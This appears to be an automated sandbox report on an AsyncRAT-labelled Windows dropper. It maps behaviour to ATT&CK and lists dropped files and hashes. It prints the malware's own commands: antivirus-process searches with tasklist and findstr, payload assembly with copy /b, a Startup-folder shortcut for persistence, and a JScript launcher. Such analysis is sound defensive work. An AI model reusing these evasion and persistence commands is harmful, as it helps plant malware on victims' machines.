Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif | Code function: 12_2_0018F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif | Code function: 12_2_0018F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif | Code function: 12_2_0018FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr | Code function: 18_2_00074005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr | Code function: 18_2_0007494A GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr | Code function: 18_2_0007C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr | Code function: 18_2_0007CD14 FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr | Code function: 18_2_0007CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr | Code function: 18_2_0007F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr | Code function: 18_2_0007F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr | Code function: 18_2_0007FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr | Code function: 18_2_00073CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_00135D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,12_2_00135D13
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user~1\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user~1\AppData\Local\Temp\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user~1\AppData\Local\Temp\724598\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user~1\AppData\Local\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user~1\AppData\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user~1\AppData\Local\Temp\724598Jump to behavior
Source: HermesKey.scr, 00000012.00000002.2556635670.0000000001A91000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllvA7
Source: Thermal.pif, 0000000C.00000002.2556840478.0000000001472000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllT
Source: PkContent.exe, 00000000.00000003.1310781106.0000000000690000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ir&Prod_VMware_SATA
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrAPI call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_001945D5 BlockInput,12_2_001945D5
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_00135240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,12_2_00135240
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_00155CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,12_2_00155CAC
Source: C:\Users\user\Desktop\PkContent.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_001788CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,12_2_001788CD
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_0014A354 SetUnhandledExceptionFilter,12_2_0014A354
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_0014A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_0014A385
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 18_2_0003A354 SetUnhandledExceptionFilter,18_2_0003A354
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 18_2_0003A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_0003A385
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_00179369 LogonUserW,12_2_00179369
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_00135240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,12_2_00135240
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_00181AC6 SendInput,keybd_event,12_2_00181AC6
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_001851E2 mouse_event,12_2_001851E2
Source: C:\Users\user\Desktop\PkContent.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Hammer Hammer.bat & Hammer.batJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 724598Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "WowLiberalCalOfficer" Weight Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Explorer + ..\West + ..\Agencies + ..\Situated yJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif Thermal.pif yJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr "C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr" "C:\Users\user\AppData\Local\GuardKey Solutions\g"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\hermeskey.url" & echo url="c:\users\user\appdata\local\guardkey solutions\hermeskey.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\hermeskey.url" & exit
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\hermeskey.url" & echo url="c:\users\user\appdata\local\guardkey solutions\hermeskey.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\hermeskey.url" & exitJump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_001788CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,12_2_001788CD
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_00184F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,12_2_00184F1C
Source: PkContent.exe, 00000000.00000003.1312253060.0000000002746000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif, 0000000C.00000003.1368352365.0000000003CFC000.00000004.00000800.00020000.00000000.sdmp, Thermal.pif, 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Thermal.pif, HermesKey.scrBinary or memory string: Shell_TrayWnd
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_0014885B cpuid 12_2_0014885B
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_00160030 GetLocalTime,__swprintf,12_2_00160030
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_00160722 GetUserNameW,12_2_00160722
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_0015416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,12_2_0015416A
Source: C:\Users\user\Desktop\PkContent.exeCode function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406805
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: HermesKey.scrBinary or memory string: WIN_81
Source: HermesKey.scrBinary or memory string: WIN_XP
Source: HermesKey.scrBinary or memory string: WIN_XPe
Source: HermesKey.scrBinary or memory string: WIN_VISTA
Source: HermesKey.scrBinary or memory string: WIN_7
Source: HermesKey.scrBinary or memory string: WIN_8
Source: HermesKey.scr.12.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 3USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_0019696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,12_2_0019696E
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_00196E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,12_2_00196E32
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 18_2_0008696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,18_2_0008696E
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 18_2_00086E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,18_2_00086E32
MITRE ATT&CK matrix (one technique per tactic column per row; a leading number is the report's signature count for that technique):

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 11 Scripting | 2 Valid Accounts | 21 Windows Management Instrumentation | 11 Scripting | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 21 Input Capture | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
Credentials | Domains | Default Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | 21 Input Capture | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 1 Command and Scripting Interpreter | 2 Valid Accounts | 2 Valid Accounts | 2 Obfuscated Files or Information | Security Account Manager | 3 File and Directory Discovery | SMB/Windows Admin Shares | 3 Clipboard Data | 1 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | 2 Registry Run Keys / Startup Folder | 21 Access Token Manipulation | 1 DLL Side-Loading | NTDS | 37 System Information Discovery | Distributed Component Object Model | Input Capture | 1 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 12 Process Injection | 111 Masquerading | LSA Secrets | 41 Security Software Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 2 Registry Run Keys / Startup Folder | 2 Valid Accounts | Cached Domain Credentials | 1 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Virtualization/Sandbox Evasion | DCSync | 4 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 21 Access Token Manipulation | Proc Filesystem | 1 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 12 Process Injection | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
Behavior graph (image not reproduced). Behavior Graph ID: 1577543; Sample: PkContent.exe; Startdate: 18/12/2024; Architecture: WINDOWS; Score: 92. Contacted hosts: ctIHfwPuGQOYqdJrz.ctIHfwPuGQOYqdJrz, bg.microsoft.map.fastly.net. Process tree: PkContent.exe -> cmd.exe (drops C:\Users\user\AppData\Local\...\Thermal.pif, PE32; starts Thermal.pif, cmd.exe, conhost.exe and 7 other processes); Thermal.pif (drops C:\Users\user\AppData\Local\...\HermesKey.scr, PE32, and C:\Users\user\AppData\Local\...\HermesKey.js, ASCII) -> cmd.exe (drops C:\Users\user\AppData\...\HermesKey.url, MS) -> conhost.exe; wscript.exe -> HermesKey.scr. Signatures shown on the graph: Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; Sigma detected: Search for Antivirus process; 4 other signatures; Windows Scripting host queries suspicious COM object (likely to drop second stage); Drops PE files with a suspicious file extension.

Source | Detection | Scanner | Label
PkContent.exe | 63% | ReversingLabs | Win32.Backdoor.AsyncRat
PkContent.exe | 100% | Avira | BDS/Agent.tfscq
PkContent.exe | 100% | Joe Sandbox ML |
Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr | 8% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\724598\Thermal.pif | 8% | ReversingLabs |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
bg.microsoft.map.fastly.net | 199.232.210.172 | true | false | | high
ctIHfwPuGQOYqdJrz.ctIHfwPuGQOYqdJrz | unknown | unknown | false | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.autoitscript.com/autoit3/J | PkContent.exe, 00000000.00000003.1312253060.0000000002754000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif, 0000000C.00000003.1368352365.0000000003D0A000.00000004.00000800.00020000.00000000.sdmp, Thermal.pif, 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp, HermesKey.scr, 00000012.00000000.1496285640.00000000000D9000.00000002.00000001.01000000.0000000A.sdmp, Ought.0.dr, Thermal.pif.3.dr, HermesKey.scr.12.dr | false | | high
http://nsis.sf.net/NSIS_ErrorError | PkContent.exe | false | | high
https://www.autoitscript.com/autoit3/ | PkContent.exe, 00000000.00000003.1312253060.0000000002754000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif, 0000000C.00000003.1368352365.0000000003D0A000.00000004.00000800.00020000.00000000.sdmp, Thermal.pif, 0000000C.00000002.2556840478.0000000001472000.00000004.00000020.00020000.00000000.sdmp, Ought.0.dr, Thermal.pif.3.dr, HermesKey.scr.12.dr | false | | high
            No contacted IP infos
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1577543
Start date and time: 2024-12-18 15:20:50 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 56s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 22
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: PkContent.exe
Detection: MAL
Classification: mal92.expl.evad.winEXE@28/14@3/0
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 102
• Number of non-executed functions: 293
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 20.109.210.53, 20.242.39.171, 20.12.23.50, 23.50.131.216, 23.50.131.200, 13.107.246.63
• Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, time.windows.com, a767.dspw65.akamai.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, fe3.delivery.mp.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
• Not all processes were analyzed; the report is missing behavior information.
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
• VT rate limit hit for: PkContent.exe
Time | Type | Description
09:21:50 | API Interceptor | 1x Sleep call for process: PkContent.exe modified
11:19:52 | API Interceptor | 3326x Sleep call for process: Thermal.pif modified
11:20:07 | API Interceptor | 2398x Sleep call for process: HermesKey.scr modified
15:21:59 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HermesKey.url
No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
bg.microsoft.map.fastly.net | https://launch.app/plainsart | malicious | HTMLPhisher | 199.232.214.172
| ji2xlo1f.exe | malicious | LummaC | 199.232.210.172
| Order_948575494759.xls | malicious | Unknown | 199.232.214.172
| DocuStream_Scan_l8obgs3v.pdf | malicious | HTMLPhisher | 199.232.214.172
| stail.exe.3.exe | malicious | Socks5Systemz | 199.232.214.172
| 22TxDBB1.bat | malicious | Unknown | 199.232.214.172
| sxVHUOSqVC.exe | malicious | Unknown | 199.232.210.172
| pyld611114.exe | malicious | Unknown | 199.232.210.172
| Lu4421.exe | malicious | AsyncRAT, DcRat, Stealerium | 199.232.214.172
| do.ps1 | malicious | Unknown | 199.232.214.172
No context
No context
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr | ldqj18tn.exe | malicious | Unknown
| ldqj18tn.exe | malicious | Unknown
| EO3RT0fEfb.exe | malicious | Unknown
| RMBOriPHVJ.exe | malicious | Unknown
| S6x3K8vzCA.exe | malicious | Unknown
| PPbimZI4LV.exe | malicious | Unknown
| l5VhEpwzJy.exe | malicious | Unknown
| duyba.lnk.download.lnk | malicious | Unknown
| pt8GJiNZDT.exe | malicious | Unknown
| c2.hta | malicious | XWorm
C:\Users\user\AppData\Local\Temp\724598\Thermal.pif | ldqj18tn.exe | malicious | Unknown
| ldqj18tn.exe | malicious | Unknown
| EO3RT0fEfb.exe | malicious | Unknown
| RMBOriPHVJ.exe | malicious | Unknown
| S6x3K8vzCA.exe | malicious | Unknown
| PPbimZI4LV.exe | malicious | Unknown
| l5VhEpwzJy.exe | malicious | Unknown
| duyba.lnk.download.lnk | malicious | Unknown
| pt8GJiNZDT.exe | malicious | Unknown
| c2.hta | malicious | XWorm
Process: C:\Windows\SysWOW64\cmd.exe
File Type: ASCII text, with very long lines (811), with CRLF line terminators
Category: dropped
Size (bytes): 17659
Entropy (8bit): 4.996564903453331
Encrypted: false
SSDEEP: 384:qG9f41OBFJrXYnH/lQutCtyuZT2Unp1vS8++ZBBgY6V7NS:qpAvCnH9QuNuZDp1RvE7NS
MD5: F15A876FE95AF76D09E4F26593B4502E
SHA1: 53D14A9F7B44DE6FD9ABA018E0F4738175A4E3A0
SHA-256: 4DDF695422DB24B6917750A923DB6D55E9973A4463CF3B60F0C732D34F7728D1
SHA-512: CBC944366518FEA910CC685C6AC99CAAFA20FFD91BA8572B5E33FEEB9529CEA6684E83365C5851D6798BCD3DC265E9157AE80E60F56F061C2B78E6C935E48741
Malicious: false
Preview: Set Transform=1..cWCQInternationally Fi Vista ..ETsBowling Deborah Present Tried Voyeur Disability Affecting Divine Notebook ..gxROrders Sector Might Alter ..wYSeekers Shirts Studio Flavor ..qbmPmid Signal Somewhat Series Textbooks Placed Trustees Spank Establish ..KPDylan Home Key Bidding Quantitative Cleaning ..Set Basement=N..OzHandbags Nbc Gardens ..RkThreshold Quest Pct Orders Sn Few Mom Stores ..atjAcquisitions Finance Wishlist ..PsnCustom Brass Moisture Emails Faced ..XODhNovember Charged Effect Barry Attention Marshall Ascii ..Set Celebrities= ..cBgSquad Grill Aquarium ..xidWAtm Give Percentage Company June Dh ..PJRCompleting Advanced None Card V Ea Taxes ..OLhrEntering ..MDhAlcohol Villa Computer Pharmacology ..nAuIndustrial Clusters ..LKEeSeasons Traditions Valium Boom Dig Implemented Cherry Successful ..dHTYSummary Majority Displayed Shall Rand ..Set Programming=Y..XfTrim Microphone Ace Feedback ..omlESuccessfully Spies ..lSStarsmerchant Syndication Masturbating Approx Thou
Process: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 182
Entropy (8bit): 4.820012868353575
Encrypted: false
SSDEEP: 3:RiMIpGXIdPHo55wWAX+d4a+kEkD5iQERuAcCwPcTFZo5uWAX+d4a+kEkD5iQERuN:RiJBJHonwWD+vkDB+uAcBwFywWD+vkDZ
MD5: C9B024719DF3364B20A25C209963DEEC
SHA1: C0BAD4ED77A6338797E5A33924E760209AC44FD7
SHA-256: EE01E3101C35F73432D3C4443B7C2EEF0F28AFD1B7B442007C33E270283964A5
SHA-512: 9BC72C9A09BF543BE6DEC19E2B89B40C4D1CB29250725F6BA8D0CBA7DD6B4D896EEED134E5A61E2B506A8A24375C17AA43887D615D9481F0F9AF33AFFAAC7E21
Malicious: true
Preview: new ActiveXObject("Wscript.Shell").Exec("\"C:\\Users\\user\\AppData\\Local\\GuardKey Solutions\\HermesKey.scr\" \"C:\\Users\\user\\AppData\\Local\\GuardKey Solutions\\g\"")
Process: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 893608
Entropy (8bit): 6.62028134425878
Encrypted: false
SSDEEP: 12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
MD5: 18CE19B57F43CE0A5AF149C96AECC685
SHA1: 1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
SHA-256: D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
SHA-512: A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 8%
Joe Sandbox View:
• Filename: ldqj18tn.exe, Detection: malicious
• Filename: ldqj18tn.exe, Detection: malicious
• Filename: EO3RT0fEfb.exe, Detection: malicious
• Filename: RMBOriPHVJ.exe, Detection: malicious
• Filename: S6x3K8vzCA.exe, Detection: malicious
• Filename: PPbimZI4LV.exe, Detection: malicious
• Filename: l5VhEpwzJy.exe, Detection: malicious
• Filename: duyba.lnk.download.lnk, Detection: malicious
• Filename: pt8GJiNZDT.exe, Detection: malicious
• Filename: c2.hta, Detection: malicious
Preview: (raw PE header dump omitted)
                                                    Process:C:\Users\user\AppData\Local\Temp\724598\Thermal.pif
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):260336
                                                    Entropy (8bit):7.999311838752394
                                                    Encrypted:true
                                                    SSDEEP:6144:SN9qVraESmDT3z3sYoAjxVs3iH96NSO8e91qkeIPC9mq5XF/:iQrskLrHoAjxVs3iH94j9QxAC9J5B
                                                    MD5:A65498AB3A69A64EAD790DB5BB2F48AA
                                                    SHA1:EB8CD723DAB355FF507B356B9286F09B9FFCD968
                                                    SHA-256:9AD27753646F1EEC5009BE7ED43BCDFC4E9AB8DFFC6FE3FF4ADC558A1F32F5CD
                                                    SHA-512:9CFCB7873C3BAD12109A85516EAF62393AA905B5A7FA93E8BC808EF0911070EA89F0E41953E67B45B74409BF0AC046FD7F4A12AB612EDF7BF01A46C459BA1CEF
                                                    Malicious:false
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                    Category:modified
                                                    Size (bytes):893608
                                                    Entropy (8bit):6.62028134425878
                                                    Encrypted:false
                                                    SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                                    MD5:18CE19B57F43CE0A5AF149C96AECC685
                                                    SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                                    SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                                    SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 8%
                                                    Joe Sandbox View:
